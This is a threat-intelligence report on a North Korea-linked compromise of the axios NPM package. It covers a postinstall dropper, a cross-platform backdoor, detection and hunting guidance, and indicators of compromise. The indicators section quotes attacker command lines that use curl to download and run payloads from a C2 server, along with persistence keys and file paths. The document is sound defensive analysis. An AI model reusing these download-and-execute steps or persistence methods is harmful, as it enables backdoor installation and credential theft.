North Korea-Nexus Threat Actor Compromises Widely Used Axios NPM Package in Supply Chain Attack

Key Takeaways

• North Korean threat actor UNC1069 compromised the popular 'axios' NPM package (versions 1.14.1 and 0.30.4) via a malicious dependency.
• The malicious dependency, 'plain-crypto-js', acts as an obfuscated dropper named SILKBELL.
• SILKBELL uses a postinstall hook to silently deploy the WAVESHAPER.V2 backdoor across Windows, macOS, and Linux.
• WAVESHAPER.V2 is a fully functional RAT capable of reconnaissance, PE injection, and file system enumeration.
• Organizations must immediately audit dependencies, pin axios to known-good versions, and rotate potentially exposed credentials.

Affected Systems

• Windows
• macOS
• Linux
• Node.js environments using axios 1.14.1 or 0.30.4

Attack Chain

The attack begins with the compromise of an axios NPM package maintainer account, allowing the threat actor to inject a malicious dependency named 'plain-crypto-js'. Upon installation, a postinstall hook executes an obfuscated JavaScript dropper (SILKBELL) that profiles the host OS. Depending on the OS (Windows, macOS, or Linux), the dropper uses native tools like curl to download platform-specific payloads from a remote C2 server. These payloads deploy the WAVESHAPER.V2 backdoor, which establishes persistence, beacons to the C2 via port 8000, and awaits commands for reconnaissance, file enumeration, or further payload injection.

Detection Availability

• YARA Rules: Yes
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: Yes
• Platforms: Google Threat Intelligence, Google Security Operations (SecOps)

The article provides YARA rules for detecting the WAVESHAPER.V2 PowerShell backdoor, the UNC1069 PowerShell dropper, and the SILKBELL JS downloader. Additionally, Google SecOps behavioral rules are available for detecting suspicious curl, node, and Windows Script Host activities.

Detection Engineering Assessment

EDR Visibility: High — The attack relies heavily on process spawning (Node.js spawning shell/curl), file drops in predictable locations (e.g., %TEMP%, /Library/Caches), and registry modifications for persistence, all of which are highly visible to modern EDRs. Network Visibility: Medium — C2 communication occurs over port 8000 using HTTP with a specific, outdated User-Agent string and predictable POST bodies, making network detection feasible if traffic is monitored. Detection Difficulty: Moderate — While the initial NPM installation might blend in with normal developer activity, the subsequent OS-level behaviors (Node.js spawning curl, copying powershell.exe to wt.exe) are highly anomalous and relatively easy to detect with behavioral rules.

Required Log Sources

• Process Creation (Event ID 4688 / Sysmon 1)
• File Creation (Sysmon 11)
• Registry Modifications (Sysmon 12/13)
• Network Connections (Sysmon 3)

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for Node.js or NPM processes spawning command-line utilities like curl, bash, or cmd.exe to download external payloads.	Process Creation	Execution	Medium
Search for the copying or renaming of powershell.exe to unusual locations, such as %PROGRAMDATA%\wt.exe.	File Creation / Process Creation	Defense Evasion	Low
Identify HTTP POST requests containing specific strings like 'packages.npm.org/product1' in the request body or URL parameters.	Network Traffic	Command and Control	Low
Monitor for the creation of executable files in /Library/Caches/ on macOS followed by immediate execution via zsh.	File Creation / Process Creation	Execution	Low
Detect network connections over port 8000 utilizing the outdated 'mozilla/4.0 (compatible; msie 8.0...' User-Agent string.	Network Traffic	Command and Control	Low

Control Gaps

• Lack of strict dependency pinning in CI/CD pipelines
• Unrestricted outbound network access from developer workstations and build servers

Key Behavioral Indicators

• Node.js spawning curl or cmd.exe
• powershell.exe copied to %PROGRAMDATA%
• Outdated MSIE 8.0 User-Agent
• POST requests with 'packages.npm.org/product' bodies

False Positive Assessment

• Low

Recommendations

Immediate Mitigation

• Audit dependency trees for axios versions 1.14.1 and 0.30.4 or plain-crypto-js versions 4.2.0/4.2.1.
• Isolate affected hosts and revert to known-good states.
• Rotate all credentials and secrets present on compromised machines.
• Block traffic to sfrclak[.]com and 142.11.206.73.

Infrastructure Hardening

• Pin axios to known safe versions (e.g., 1.14.0 or 0.30.3) in package-lock.json.
• Configure corporate NPM repositories to serve only known-good versions.
• Clear local and shared npm, yarn, and pnpm caches on all workstations and build servers.

User Protection

• Deploy EDR to developer environments to monitor for suspicious child processes of Node.js.
• Isolate development environments in containers or sandboxes to restrict host filesystem access.

Security Awareness

• Educate developers on the risks of supply chain attacks and the importance of dependency pinning.
• Implement policies for secure secret vaulting (e.g., using aws-vault) instead of plaintext storage.

MITRE ATT&CK Mapping

• T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
• T1059.001 - Command and Scripting Interpreter: PowerShell
• T1059.004 - Command and Scripting Interpreter: Unix Shell
• T1059.006 - Command and Scripting Interpreter: Python
• T1059.007 - Command and Scripting Interpreter: JavaScript
• T1105 - Ingress Tool Transfer
• T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
• T1055.002 - Process Injection: Portable Executable Injection
• T1082 - System Information Discovery
• T1083 - File and Directory Discovery
• T1071.001 - Application Layer Protocol: Web Protocols
• T1036.003 - Masquerading: Rename System Utilities

Additional IOCs

• Ips:
  • 23[.]254[.]167[.]216 - Suspected UNC1069 Infrastructure
• Urls:
  • hxxp://sfrclak[[.]]com:8000 - WAVESHAPER.V2 C2 endpoint
• File Hashes:
  • fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf (SHA256) - WAVESHAPER.V2 Linux Python RAT
  • 92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a (SHA256) - WAVESHAPER.V2 macOS Native Binary
  • 617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101 (SHA256) - WAVESHAPER.V2 Windows Stage 1
  • ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c (SHA256) - WAVESHAPER.V2
  • f7d335205b8d7b20208fb3ef93ee6dc817905dc3ae0c10a0b164f4e7d07121cd (SHA256) - system.bat persistence script
• Registry Keys:
  • HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate - WAVESHAPER.V2 Windows persistence mechanism
• File Paths:
  • %PROGRAMDATA%\wt.exe - Copied Windows Terminal executable used for evasion
  • %TEMP%\6202033.ps1 - Downloaded PowerShell payload on Windows
  • %PROGRAMDATA%\system.bat - Hidden batch file for Windows persistence
  • /Library/Caches/com.apple.act.mond - macOS Mach-O binary payload location
  • /tmp/ld.py - Linux Python backdoor location
• Command Lines:
  • Purpose: Download and execute PowerShell payload via copied Windows Terminal | Tools: cmd.exe, curl.exe, wt.exe | Stage: Execution / Payload Delivery | cmd.exe /c curl -s -X POST -d packages.npm.org/product1
  • Purpose: Download and execute macOS Mach-O binary | Tools: curl, chmod, zsh | Stage: Execution / Payload Delivery | curl -o /Library/Caches/com.apple.act.mond -d packages.npm.org/product0
• Other:
  • mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0) - Hard-coded User-Agent used by WAVESHAPER.V2